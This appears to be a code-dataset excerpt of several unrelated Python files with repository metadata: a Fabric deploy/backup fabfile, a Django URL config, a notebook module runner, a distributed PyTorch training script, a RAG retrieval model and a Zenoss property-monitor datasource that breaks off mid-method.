raise invoke.ParseError(f'Filename "{filename}" is not registered')
upload_file(file_path_format, filename)
else:
for name in GlobalConfig.source_filenames:
upload_file('src/{}', name)
for name in GlobalConfig.meta_filenames:
upload_file('{}', name)
for directory in GlobalConfig.source_directories:
upload_directory(directory)
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'filename': 'An optional filename to deploy to the server'})
def deploy(connection: fabric.Connection, filename: typing.Optional[str] = None) -> None:
upload(connection, filename)
with connection.cd(GlobalConfig.project_name):
execute(connection, 'eval "$(pyenv init --path)" && poetry install --no-dev', {
'PATH': '$HOME/.pyenv/bin:$HOME/.poetry/bin:$PATH'
})
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'filename': 'The filename to backup locally from the server'})
def backup(connection: fabric.Connection, filename: str) -> None:
current_date = datetime.datetime.now().strftime(src.constants.GENERIC_DATE_FORMAT)
name, extension = os.path.splitext(filename)
with connection.cd(GlobalConfig.project_name):
connection.get(f'{GlobalConfig.project_name}/{filename}', f'backup_{name}_{current_date}{extension}')
@fabric.task(pre=[configure], hosts=[GlobalConfig.host])
def backup_db(context: fabric.Connection) -> None:
backup(context, 'file_convert.sqlite')
| revolter/FileConvertBot | fabfile.py | fabfile.py | py | 5,563 | python | en | code | 45 | github-code | 1 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "configparse... |
18780622614 | from django.urls import path
from . import views
app_name = 'quote'
urlpatterns = [
path('', views.quote_page,),
path('new', views.quote_page, name="new_quote"),
path('schedule', views.schedule, name="schedule"),
path('scheduling', views.scheduling, name="scheduling"),
path('address', views.address, name="address"),
path('setaddress', views.setaddress, name="setaddress"),
path('revieworder', views.revieworder, name="revieworder"),
path('submitorder', views.submitorder, name="submitorder"),
path('receipt', views.receipt, name="receipt"),
path('billing', views.billing, name="billing"),
path('clear', views.clear_quote, name="clear_quote"),
path('save', views.save, name="save_quote"),
path('saving', views.saving, name="saving_quote"),
path('savedquotes', views.savedquotes, name="savedquotes"),
path('delete/<int:quoteID>', views.destroyQuote, name="destroyQuote"),
path('edit/<int:quoteID>', views.editquote, name="edit_quote"),
path('myaccount', views.account, name="account"),
path('manage_address', views.manage_address, name="manage_address"),
# AJAX to select a service and put it in session and then to table
path('pickitem/<int:itemID>', views.pick_item, name="pickitem"),
path('updateitem/<int:itemID>/remove', views.remove_item, name="removeitem"),
path('updateitem/<int:itemID>', views.update_item, name="updateitem"),
path('updateitem/package/<str:package>/<int:itemID>', views.update_item_package, name="updateitempackage"),
path('updatequotetable', views.update_quote_table, name="updateQuoteTable")
]
| kozort/convertaquote | convertaquote_proj/quote_app/urls.py | urls.py | py | 1,637 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
13298319226 | from os import environ as env
from tempfile import NamedTemporaryFile
from .papermill import execute
from . import gsmo
from utz import cd, sh
class Modules:
def __init__(self, run=None, skip=None, conf=None):
if isinstance(run, str): run = run.split(',')
if isinstance(skip, str): skip = skip.split(',')
if run is not None and skip is not None:
raise RuntimeError('Specify at most one of {run,skip}: (%s, %s)' % (run, skip))
self.runs = run
self.skips = skip
self.conf = conf or {}
def run(self, module, nb='run.ipynb', out='nbs', dind=None, *args, **kwargs):
if self.skips and module in self.skips:
print(f'Module {module} marked as "skip"; skipping')
return
if self.runs and module not in self.runs:
print(f'Module {module} not marked as "run"; skipping')
return
module_kwargs = self.conf.get(module, {})
module_kwargs.update(kwargs)
with cd(module):
print(f'Running module: {module}')
if dind is not False:
with NamedTemporaryFile() as tmp:
with open(tmp.name,'w') as f:
import yaml
yaml.safe_dump(kwargs, f, sort_keys=False)
cmd = []
if 'GSMO_IMAGE' in env:
cmd += ['-i',env['GSMO_IMAGE']]
cmd += ['-I','run','-o',out,'-x',nb,'-Y',tmp.name]
gsmo.main(*cmd)
else:
execute(
nb,
out,
*args,
**module_kwargs,
)
sh('git','add',module)
sh('git','commit','-m',module)
def __call__(self, *args, **kwargs): return self.run(*args, **kwargs)
| runsascoded/gsmo | gsmo/modules.py | modules.py | py | 1,856 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "utz.cd",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "tempfile.NamedTemporaryFile",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "yaml.safe_dump",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.environ",
"l... |
31971486845 | import torch.nn as nn
import torch.multiprocessing as mp
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.distributed import DistributedSampler
import argparse
from lib.utils.file import bool_flag
from lib.utils.distributed import init_dist_node, init_dist_gpu, get_shared_folder
from lib.utils.flatten import flatten_dict
import submitit, random, sys
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser(description='Template')
parser.add_argument('--cfg', type=str, help='Configuration file')
# PATHS
paths_group = parser.add_argument_group("PATHS")
paths_group.add_argument('--data', type=str, help='Path to raw dataset directory')
paths_group.add_argument('--processed_data', type=str, help='Path to processed dataset directory')
paths_group.add_argument('--processed_pattern', type=str, help='Pattern for processed data files')
paths_group.add_argument('--genuine_pattern', type=str, help='Pattern for genuine data files')
paths_group.add_argument('--simulated_pattern', type=str, help='Pattern for simulated data files')
paths_group.add_argument('--out', type=str, help='Path to out directory')
# GENERAL
general_group = parser.add_argument_group("GENERAL")
general_group.add_argument('--model', type=str, help='Model name')
general_group.add_argument('--reset', action='store_true', help='Reset saved model logs and weights')
general_group.add_argument('--tb', action='store_true', help='Start TensorBoard')
general_group.add_argument('--gpus', type=str, help='GPUs list, only works if not on slurm')
general_group.add_argument('--k_neighbors', type=int, help='Number of neighbors to consider in k-NN algorithm')
# Model
model_group = parser.add_argument_group("Model")
model_group.add_argument('--num_layers', type=int, help='Number of layers')
model_group.add_argument('--hidden_dim', type=int, help='Number of nodes in the hidden layer.')
# Dataset
dataset_group = parser.add_argument_group("Dataset")
dataset_group.add_argument('--dataset', type=str, help='Dataset to choose')
dataset_group.add_argument('--batch_per_gpu', type=int, help='Batch size per gpu')
dataset_group.add_argument('--shuffle', action='store_true', help='Shuffle dataset')
dataset_group.add_argument('--workers', type=int, help='Number of workers')
dataset_group.add_argument('--keys', type=str, nargs='+', help='Columns to be used as data features')
# Architecture
architecture_group = parser.add_argument_group("Architecture")
architecture_group.add_argument('--arch', type=str, help='Architecture to choose')
# Trainer
trainer_group = parser.add_argument_group("Trainer")
trainer_group.add_argument('--trainer', type=str, help='Trainer to choose')
trainer_group.add_argument('--epochs', type=int, help='Number of epochs')
trainer_group.add_argument('--save_every', type=int, help='Save model every n epochs')
trainer_group.add_argument('--fp16', action='store_true', help='Use fp16')
# Optimization
optimization_group = parser.add_argument_group("Optimization")
optimization_group.add_argument('--optimizer', type=str, help='Optimizer to choose between "adam", "sgd", and "adagrad"')
optimization_group.add_argument('--lr_start', type=float, help='Learning rate start')
optimization_group.add_argument('--lr_end', type=float, help='Learning rate end')
optimization_group.add_argument('--lr_warmup', type=int, help='Learning rate warmup')
# SLURM
slurm_group = parser.add_argument_group("SLURM")
slurm_group.add_argument('--slurm', action='store_true', help='Use slurm')
slurm_group.add_argument('--slurm_ngpus', type=int, help='Number of gpus per node')
slurm_group.add_argument('--slurm_nnodes', type=int, help='Number of nodes')
slurm_group.add_argument('--slurm_nodelist', type=str, help='Node list')
slurm_group.add_argument('--slurm_partition', type=str, help='Partition')
slurm_group.add_argument('--slurm_timeout', type=int, help='Timeout')
args = parser.parse_args()
# === Read CFG File === #
if args.cfg:
with open(args.cfg, 'r') as f:
import ruamel.yaml as yaml
yml = yaml.safe_load(f)
# update values from cfg file only if not passed in cmdline
cmd = [c[1:] for c in sys.argv if c[0]=='-']
for k,v in flatten_dict(yml):
if k not in cmd:
args.__dict__[k] = v
return args
class SLURM_Trainer(object):
def __init__(self, args):
self.args = args
def __call__(self):
init_dist_node(self.args)
train(None, self.args)
def main():
args = parse_args()
args.port = random.randint(49152,65535)
if args.slurm:
# Almost copy-paste from https://github.com/facebookresearch/deit/blob/main/run_with_submitit.py
args.output_dir = get_shared_folder(args) / "%j"
Path(args.output_dir).mkdir(parents=True, exist_ok=True)
executor = submitit.AutoExecutor(folder=args.output_dir, slurm_max_num_timeout=30)
if hasattr(args, "slurm_account"):
executor.update_parameters(
mem_gb=12*args.slurm_ngpus,
gpus_per_node=args.slurm_ngpus,
tasks_per_node=args.slurm_ngpus,
cpus_per_task=2,
nodes=args.slurm_nnodes,
timeout_min=2800,
slurm_partition=args.slurm_partition,
account=args.slurm_account
)
else:
executor.update_parameters(
mem_gb=12*args.slurm_ngpus,
gpus_per_node=args.slurm_ngpus,
tasks_per_node=args.slurm_ngpus,
cpus_per_task=2,
nodes=args.slurm_nnodes,
timeout_min=2800,
slurm_partition=args.slurm_partition
)
if args.slurm_nodelist:
executor.update_parameters(slurm_additional_parameters = {"nodelist": f'{args.slurm_nodelist}' })
executor.update_parameters(name=args.model)
trainer = SLURM_Trainer(args)
job = executor.submit(trainer)
print(f"Submitted job_id: {job.job_id}")
else:
init_dist_node(args)
mp.spawn(train, args = (args,), nprocs = args.ngpus_per_node)
def train(gpu, args):
# === SET ENV === #
init_dist_gpu(gpu, args)
# === DATA === #
get_dataset = getattr(__import__("lib.datasets.{}".format(args.dataset), fromlist=["get_dataset"]), "get_dataset")
dataset = get_dataset(args)
sampler = DistributedSampler(dataset, shuffle=args.shuffle, num_replicas = args.world_size, rank = args.rank, seed = 31)
loader = DataLoader(dataset=dataset,
sampler = sampler,
batch_size=args.batch_per_gpu,
num_workers= args.workers,
pin_memory = True,
drop_last = True
)
print(f"Data loaded")
# === MODEL === #
get_model = getattr(__import__("lib.arch.{}".format(args.arch), fromlist=["get_model"]), "get_model")
setattr(args, "input_dim", dataset.num_node_features)
setattr(args, "outpup_dim", dataset.num_classes)
setattr(args, "activation_function", nn.functional.relu)
model = get_model(args).cuda(args.gpu)
model = nn.SyncBatchNorm.convert_sync_batchnorm(model) # use if model contains batchnorm.
model = nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
# === LOSS === #
setattr(args, "loader", loader)
from lib.core.loss import get_loss
loss = get_loss(args).cuda(args.gpu)
# === OPTIMIZER === #
from lib.core.optimizer import get_optimizer
optimizer = get_optimizer(model, args)
# === TRAINING === #
Trainer = getattr(__import__("lib.trainers.{}".format(args.trainer), fromlist=["Trainer"]), "Trainer")
Trainer(args, loader, model, loss, optimizer).fit()
if __name__ == "__main__":
main()
| Samuele-Colombo/transient_detection_distributed | train.py | train.py | py | 8,094 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ruamel.yaml.safe_load",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "ruamel.yaml",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "sys.argv",
... |
73247744995 | from typing import Optional, List
import numpy as np
import torch
import torch.nn as nn
from transformers import RagSequenceForGeneration, AutoModel, AutoConfig, RagRetriever, BatchEncoding
from transformers.models.dpr.modeling_dpr import DPRQuestionEncoderOutput
from distributed_pytorch_retriever import RagPyTorchDistributedRetriever
class RobertaRetriever(nn.Module):
def __init__(self, model_name):
super().__init__()
config = AutoConfig.from_pretrained(model_name)
self.encoder = AutoModel.from_pretrained(model_name)
self.project = nn.Sequential(nn.Linear(config.hidden_size, config.hidden_size),
nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps))
def encode_seq(self, input_ids, mask):
cls_rep = self.encoder(input_ids, mask)[0][:, 0, :]
vector = self.project(cls_rep)
return vector
def forward(self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,):
pooled = self.encode_seq(input_ids, attention_mask)
if not return_dict:
return [pooled]
return DPRQuestionEncoderOutput(pooler_output=pooled, hidden_states=None, attentions=None) # TODO: replace none
def load_saved(model, path, exact=True):
try:
state_dict = torch.load(path)
except:
state_dict = torch.load(path, map_location=torch.device('cpu'))
def filter(x):
if x.startswith('rag.question_encoder.'):
return x[21:]
if x.startswith('module.'):
return x[7:]
return x
if exact:
state_dict = {filter(k): v for (k, v) in state_dict.items()}
else:
state_dict = {filter(k): v for (k, v) in state_dict.items() if filter(k) in model.state_dict()}
model.load_state_dict(state_dict, strict=False) # TODO: embeddings.position_ids missing
return model
class MyRagRetriever(RagRetriever):
def __call__(
self,
question_input_ids: List[List[int]],
question_hidden_states: np.ndarray,
question_strings: List[str]=None,
prefix=None,
n_docs=None,
return_tensors=None,
) -> BatchEncoding:
n_docs = n_docs if n_docs is not None else self.n_docs
prefix = prefix if prefix is not None else self.config.generator.prefix
retrieved_doc_embeds, doc_ids, docs = self.retrieve(question_hidden_states, n_docs)
if question_strings is None:
input_strings = self.question_encoder_tokenizer.batch_decode(question_input_ids, skip_special_tokens=True)
else:
input_strings = [s.replace('[MASK]', '<mask>') for s in question_strings] # TODO: make it more robust to different models
context_input_ids, context_attention_mask = self.postprocess_docs(
docs, input_strings, prefix, n_docs, return_tensors=return_tensors
)
return BatchEncoding(
{
"context_input_ids": context_input_ids,
"context_attention_mask": context_attention_mask,
"retrieved_doc_embeds": retrieved_doc_embeds,
"doc_ids": doc_ids,
},
tensor_type=return_tensors,
)
class MyRagPyTorchDistributedRetriever(RagPyTorchDistributedRetriever):
def __call__(
self,
question_input_ids: List[List[int]],
question_hidden_states: np.ndarray,
question_strings: List[str]=None,
prefix=None,
n_docs=None,
return_tensors=None,
) -> BatchEncoding:
n_docs = n_docs if n_docs is not None else self.n_docs
prefix = prefix if prefix is not None else self.config.generator.prefix
retrieved_doc_embeds, doc_ids, docs = self.retrieve(question_hidden_states, n_docs)
if question_strings is None:
input_strings = self.question_encoder_tokenizer.batch_decode(question_input_ids, skip_special_tokens=True)
else:
input_strings = [s.replace('[MASK]', '<mask>') for s in question_strings] # TODO: make it more robust to different models
context_input_ids, context_attention_mask = self.postprocess_docs(
docs, input_strings, prefix, n_docs, return_tensors=return_tensors
)
return BatchEncoding(
{
"context_input_ids": context_input_ids,
"context_attention_mask": context_attention_mask,
"retrieved_doc_embeds": retrieved_doc_embeds,
"doc_ids": doc_ids,
},
tensor_type=return_tensors,
)
class MemoryBank(nn.Module):
def __init__(self, bank_size: int, emb_size: int = None):
super().__init__()
self.bank_size = bank_size
self.emb_size = emb_size
if emb_size is not None:
self.register_buffer('queue', torch.randn(bank_size, emb_size))
self.register_buffer('ptr', torch.zeros(1, dtype=torch.long))
self.register_buffer('is_full', torch.zeros(1, dtype=bool))
@property
def is_initialized(self):
return hasattr(self, 'queue')
@torch.no_grad()
def put(self,
embeddings: torch.FloatTensor): # (bs, emb_size)
bs, es = embeddings.size()
ptr = int(self.ptr)
if not self.is_initialized:
self.emb_size = es
self.register_buffer('queue', torch.randn(self.bank_size, self.emb_size).to(embeddings.device))
# update queue
if ptr + bs > self.bank_size: # reach the end of the queue
self.queue[ptr:, :] = embeddings[:self.bank_size - ptr]
self.queue[:ptr + bs - self.bank_size, :] = embeddings[self.bank_size - ptr:]
self.is_full = self.is_full | True
else:
self.queue[ptr:ptr + bs, :] = embeddings
# move pointer
self.ptr[0] = (ptr + bs) % self.bank_size
return
@torch.no_grad()
def get(self):
if not self.is_initialized:
raise ValueError('queue not initialized')
if not self.is_full:
return self.queue[:self.ptr] # (<bank_size, emb_size)
return self.queue
class MyRagSequenceForGeneration(RagSequenceForGeneration):
def set_additional_retrievers(self, retrievers: List):
self._retrievers = retrievers
def retrieve_from_multiple(self, *args, **kwargs):
if not hasattr(self, '_retrievers'):
return self.retriever(*args, **kwargs)
all_retrievers = [self.retriever] + self._retrievers
question_hidden_states = torch.tensor(args[1])
n_docs = kwargs['n_docs']
cii_li = []
cam_li = []
rde_li = []
di_li = []
ds_li = []
# collect retrieved results from all retrievers
for retriever in all_retrievers:
retriever_outputs = retriever(*args, **kwargs)
cii, cam, rde, di = (
retriever_outputs['context_input_ids'], # (batch_size * n_docs, seq_len)
retriever_outputs['context_attention_mask'], # (batch_size * n_docs, seq_len)
retriever_outputs['retrieved_doc_embeds'], # (batch_size, n_docs, emb_size)
retriever_outputs['doc_ids'] # (batch_size, n_docs)
)
cii_li.append(cii.view(-1, n_docs, cii.size(-1)))
cam_li.append(cam.view(-1, n_docs, cam.size(-1)))
rde_li.append(rde)
di_li.append(di)
doc_scores = torch.bmm(question_hidden_states.unsqueeze(1), rde.to(question_hidden_states).transpose(1, 2)).squeeze(1)
ds_li.append(doc_scores)
# merge results
cii = torch.cat(cii_li, 1)
cam = torch.cat(cam_li, 1)
rde = torch.cat(rde_li, 1)
di = torch.cat(di_li, 1)
doc_scores = torch.cat(ds_li, 1)
# sort by scores and select
doc_scores, topk_ind = torch.topk(doc_scores, n_docs, dim=1)
cii = torch.gather(cii, 1, topk_ind.unsqueeze(-1).repeat(1, 1, cii.size(-1))).view(-1, cii.size(-1))
cam = torch.gather(cam, 1, topk_ind.unsqueeze(-1).repeat(1, 1, cam.size(-1))).view(-1, cam.size(-1))
rde = torch.gather(rde, 1, topk_ind.unsqueeze(-1).repeat(1, 1, rde.size(-1)))
di = torch.gather(di, 1, topk_ind)
return {'context_input_ids': cii, 'context_attention_mask': cam, 'retrieved_doc_embeds': rde, 'doc_ids': di}
@torch.no_grad()
def generate(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.LongTensor] = None,
context_input_ids=None,
context_attention_mask=None,
doc_scores=None,
do_deduplication=None, # defaults to True
num_return_sequences=None, # defaults to 1
num_beams=None, # defaults to 1
n_docs=None,
**model_kwargs
):
"""
Implements RAG sequence "thorough" decoding. Read the :meth:`~transformers.PreTrainedModel.generate``
documentation for more information on how to set other generate input parameters.
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
The sequence used as a prompt for the generation. If :obj:`input_ids` is not passed, then
:obj:`context_input_ids` has to be provided.
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
context_input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size * config.n_docs, config.max_combined_length)`, `optional`, returned when `output_retrieved=True`):
Input IDs post-processed from the retrieved documents and the question encoder input_ids by the
retriever.
context_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size * config.n_docs, config.max_combined_length)`, `optional`, returned when `output_retrieved=True`):
Attention mask post-processed from the retrieved documents and the question encoder :obj:`input_ids` by
the retriever.
If the model is not initialized with a ``retriever`` or ``input_ids`` is not given,
:obj:`context_input_ids` and :obj:`context_attention_mask` have to be provided to the forward pass.
They are returned by :meth:`~transformers.RagRetriever.__call__`.
doc_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, config.n_docs)`):
Score between each retrieved document embeddings (see :obj:`retrieved_doc_embeds`) and
:obj:`question_encoder_last_hidden_state`.
If the model is not initialized with a ``retriever`` or ``input_ids`` is not given, :obj:`doc_scores`
has to be provided to the forward pass. :obj:`doc_scores` are returned by
:meth:`~transformers.RagRetriever.__call__`.
do_deduplication (:obj:`bool`, `optional`):
Whether or not to deduplicate the generations from different context documents for a given input. Has
to be set to :obj:`False` if used while training with distributed backend.
num_return_sequences(:obj:`int`, `optional`, defaults to 1):
The number of independently computed returned sequences for each element in the batch. Note that this
is not the value we pass to the ``generator``'s `:func:`~transformers.PreTrainedModel.generate``
function, where we set ``num_return_sequences`` to :obj:`num_beams`.
num_beams (:obj:`int`, `optional`, defaults to 1):
Number of beams for beam search. 1 means no beam search.
n_docs (:obj:`int`, `optional`, defaults to :obj:`config.n_docs`)
Number of documents to retrieve and/or number of documents for which to generate an answer.
kwargs:
Additional kwargs will be passed to :meth:`~transformers.PreTrainedModel.generate`.
Return:
:obj:`torch.LongTensor` of shape :obj:`(batch_size * num_return_sequences, sequence_length)`: The generated
sequences. The second dimension (sequence length) is either equal to :obj:`max_length` or shorter if all
batches finished early due to the :obj:`eos_token_id`.
"""
n_docs = n_docs if n_docs is not None else self.config.n_docs
do_deduplication = do_deduplication if do_deduplication is not None else self.config.do_deduplication
num_doc_return_sequences = (
num_return_sequences if num_return_sequences is not None else self.config.num_return_sequences
)
num_beams = num_beams if num_beams is not None else self.config.num_beams
assert (
input_ids is not None or context_input_ids is not None
), " At least one of input_ids or context_input_ids must be given"
if self.retriever is not None and context_input_ids is None:
question_hidden_states = self.question_encoder(input_ids, attention_mask=attention_mask)[0]
context_input_ids = self.retriever(
input_ids,
question_hidden_states.cpu().detach().to(torch.float32).numpy(),
prefix=self.generator.config.prefix,
n_docs=n_docs,
return_tensors="pt",
)["context_input_ids"]
# set to correct device
context_input_ids = context_input_ids.to(input_ids)
hypos = []
logprobs = []
model_kwargs["num_beams"] = num_beams
model_kwargs["num_return_sequences"] = num_beams
model_kwargs["attention_mask"] = None
batch_size = input_ids.shape[0] if input_ids is not None else context_input_ids.shape[0] // n_docs
for index in range(batch_size):
# first, generate beams from documents:
generator_input_ids = context_input_ids[index * n_docs: (index + 1) * n_docs] # (n_docs, max_len)
output_sequences = self.generator.generate(
generator_input_ids,
**model_kwargs,
) # n_docs * n_beam, tgt_len
if do_deduplication:
# do_deduplication, max_output_len
output_sequences = torch.stack(list({str(k.tolist()): k for k in output_sequences}.values()))
num_candidates = output_sequences.shape[
0
] # after deduplication, this number can be less than n_docs*n_beam
# then, run model forwards to get nll scores:
if input_ids is not None:
new_input_ids = input_ids[index: index + 1].repeat(num_candidates, 1)
outputs = self(new_input_ids, labels=output_sequences, exclude_bos_score=True)
else: # input_ids is None, need context_input_ids/mask and doc_scores
assert (
context_attention_mask is not None
), "Make sure that `context_attention_mask` are passed, if no `input_ids` is set. Alternatively, you can set a retriever using the `set_retriever(...)` function."
assert (
doc_scores is not None
), "Make sure that `doc_scores` are passed, if no `input_ids` is set. Alternatively, you can set a retriever using the `set_retriever(...)` function."
individual_input_ids = generator_input_ids.repeat(
num_candidates, 1
) # (num_candidates*n_docs, max_len)
individual_attention_mask = context_attention_mask[index * n_docs: (index + 1) * n_docs]
individual_attention_mask = individual_attention_mask.repeat(num_candidates, 1)
individual_doc_scores = doc_scores[index: (index + 1), :] # doc_scores.shape = [batch, n_docs]
individual_doc_scores = individual_doc_scores.repeat(num_candidates, 1) # [num_candidates, n_docs]
outputs = self(
context_input_ids=individual_input_ids,
context_attention_mask=individual_attention_mask,
doc_scores=individual_doc_scores,
labels=output_sequences,
exclude_bos_score=True,
)
lps, top_cand_inds = (-outputs["loss"]).topk(num_doc_return_sequences)
# add hypothesis
hypos.append(output_sequences[top_cand_inds])
logprobs.append(lps)
logprobs = torch.cat(logprobs, 0)
return self._cat_and_pad(hypos, pad_token_id=self.config.generator.pad_token_id), logprobs
@staticmethod
def load_question_encoder(rag_model, question_encoder_path: str):
model = RobertaRetriever('roberta-base')
model = load_saved(model, question_encoder_path, exact=False)
rag_model.rag.question_encoder = model
def get_nll(
self, seq_logits, doc_scores, target, reduce_loss=False, epsilon=0.0, exclude_bos_score=False, n_docs=None
):
# shift tokens left
target = torch.cat(
[target[:, 1:], target.new(target.shape[0], 1).fill_(self.config.generator.pad_token_id)], 1
)
n_docs = n_docs if n_docs is not None else self.config.n_docs
# bos_token_id is None for T5
bos_token_id = self.config.bos_token_id or self.config.generator.bos_token_id
use_bos = bos_token_id is not None and target[:, 0].eq(bos_token_id).all()
def _mask_pads(ll, smooth_obj):
pad_mask = target.eq(self.config.generator.pad_token_id)
if pad_mask.any():
ll.masked_fill_(pad_mask, 0.0)
smooth_obj.masked_fill_(pad_mask, 0.0)
return ll.squeeze(-1), smooth_obj.squeeze(-1)
# seq_logits dim = (batch*n_docs, tgt_len , #vocabs)
seq_logprobs = torch.nn.functional.log_softmax(seq_logits, dim=-1).view(
seq_logits.shape[0] // n_docs, n_docs, -1, seq_logits.size(-1)
) # batch_size x n_docs x tgt_len x #vocab_size
# (bs, n_docs) or (bs, bs * n_docs) or (bs, bs * n_docs + memory_bank_size)
doc_logprobs = torch.nn.functional.log_softmax(doc_scores, dim=1)
bs = doc_logprobs.size(0)
if doc_logprobs.size(1) == n_docs:
pass
elif doc_logprobs.size(1) >= bs * n_docs: # contain doc log probs over the whole batch (plus memory bank)
# (bs, bs, n_docs)
doc_logprobs = doc_logprobs[:, :bs * n_docs].view(bs, bs, n_docs) # remove memory bank
# (bs, n_docs)
doc_logprobs = torch.masked_select(
doc_logprobs,
torch.eye(bs).unsqueeze(-1).bool().to(doc_logprobs.device)).view(bs, n_docs)
else:
raise Exception(f'the size of document log prob {doc_logprobs.size()} is unexpected')
doc_logprobs = doc_logprobs.unsqueeze(-1).unsqueeze(-1)
# RAG-sequence marginalization
first_token_scores = seq_logprobs[:, :, :1, :]
second_token_scores = seq_logprobs[:, :, 1:2, :]
remainder = seq_logprobs[:, :, 2:, :]
rag_logprobs = torch.cat([first_token_scores, second_token_scores + doc_logprobs, remainder], dim=2)
# calculate loss
target = target.unsqueeze(1).unsqueeze(-1).repeat(1, n_docs, 1, 1)
assert target.dim() == rag_logprobs.dim()
ll = rag_logprobs.gather(dim=-1, index=target)
smooth_obj = rag_logprobs.sum(dim=-1, keepdim=True) # total sum of all (normalised) logits
ll, smooth_obj = _mask_pads(ll, smooth_obj)
# sum over tokens, exclude bos while scoring
ll = ll[:, :, 1:].sum(2) if exclude_bos_score and use_bos else ll.sum(2)
smooth_obj = smooth_obj.sum(2)
ll = ll.logsumexp(1) # logsumexp over docs
smooth_obj = smooth_obj.logsumexp(1)
nll_loss = -ll
smooth_loss = -smooth_obj
if reduce_loss:
nll_loss = nll_loss.sum()
smooth_loss = smooth_loss.sum()
eps_i = epsilon / rag_logprobs.size(-1)
loss = (1.0 - epsilon) * nll_loss + eps_i * smooth_loss
return loss
| jzbjyb/multihop | rag/rag_model.py | rag_model.py | py | 19,076 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "transformers.AutoConfig.from_pretrained",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": ... |
22542445043 | from zope.component import adapts
from zope.interface import implements
from Products.ZenModel.RRDDataSource import SimpleRRDDataSource
from Products.ZenModel.ZenPackPersistence import ZenPackPersistence
from Products.ZenUtils.ZenTales import talesEvalStr
from Products.Zuul.form import schema
from Products.Zuul.infos import ProxyProperty
from Products.Zuul.infos.template import RRDDataSourceInfo
from Products.Zuul.interfaces import IRRDDataSourceInfo
from Products.Zuul.utils import ZuulMessageFactory as _t
from Products.ZenWidgets import messaging
from Products.Zuul.interfaces import ICatalogTool, IInfo
from Products.AdvancedQuery import Eq
class MonitoredPropertyDataSource(ZenPackPersistence, SimpleRRDDataSource):
'''
Model class for MonitoredPropertyDataSource.
'''
ZENPACKID = 'ZenPacks.zenoss.PropertyMonitor'
MBP_TYPE = 'Property'
sourcetypes = (MBP_TYPE,)
sourcetype = MBP_TYPE
# SimpleRRDDataSource property overrides.
cycletime = '${here/zPropertyMonitorInterval}'
eventClass = '/Ignore'
severity = 0
class_name = ''
property_name = ''
_properties = tuple([p for p in SimpleRRDDataSource._properties if p['id'] != 'cycletime']) + (
{'id': 'cycletime', 'type': 'string', 'mode': 'w'},
{'id': 'class_name', 'type': 'string', 'mode': 'w'},
{'id': 'property_name', 'type': 'string', 'mode': 'w'},
)
def getDescription(self):
'''
Return a friendly description of this datasource.
'''
if not self.property_name:
return 'Not Configured'
return "%s / %s" % (self.class_name, self.property_name)
def getComponent(self, context):
return context.id
def talesEval(self, text, context):
device = context.device()
extra = {
'device': device,
'dev': device,
'devname': device.id,
'datasource': self,
'ds': self,
}
return talesEvalStr(str(text), context, extra=extra)
def getCycleTime(self, context):
return int(self.talesEval(self.cycletime, context))
def testDataSourceAgainstDevice(self, testDevice, REQUEST, write, errorLog):
"""
Does the majority of the logic for testing a datasource against the device
@param string testDevice The id of the device we are testing
@param Dict REQUEST the browers request
@param Function write The output method we are using to stream the result of the command
@parma Function errorLog The output method we are using to report errors
"""
out = REQUEST.RESPONSE
# Determine which device to execute against
device = None
if testDevice:
# Try to get specified device
device = self.findDevice(testDevice)
if not device:
errorLog(
'No device found',
'Cannot find device matching %s.' % testDevice,
priority=messaging.WARNING
)
return self.callZenScreen(REQUEST)
elif hasattr(self, 'device'):
# ds defined on a device, use that device
device = self.device()
elif hasattr(self, 'getSubDevicesGen'):
# ds defined on a device class, use any device from the class
try:
device = self.getSubDevicesGen().next()
except StopIteration:
# No devices in this class, bail out
pass
if not device:
errorLog(
'No Testable Device',
'Cannot determine a device against which to test.',
priority=messaging.WARNING
)
return self.callZenScreen(REQUEST)
## Execute the datasource
class_name = REQUEST.get('class_name')
property_name = REQUEST.get('property_name')
results = ICatalogTool(device).search(query=Eq('meta_type', class_name))
if not results.total:
out.write("0 objects found. No test performed.\n")
return
if results.total > 10:
out.write("%d %s components found, showing first 10<p>\n" % (results.total, class_name))
for (i, result) in enumerate(results):
obj = result.getObject()
info = IInfo(obj)
property_value = getattr(info, property_name, "ERROR")
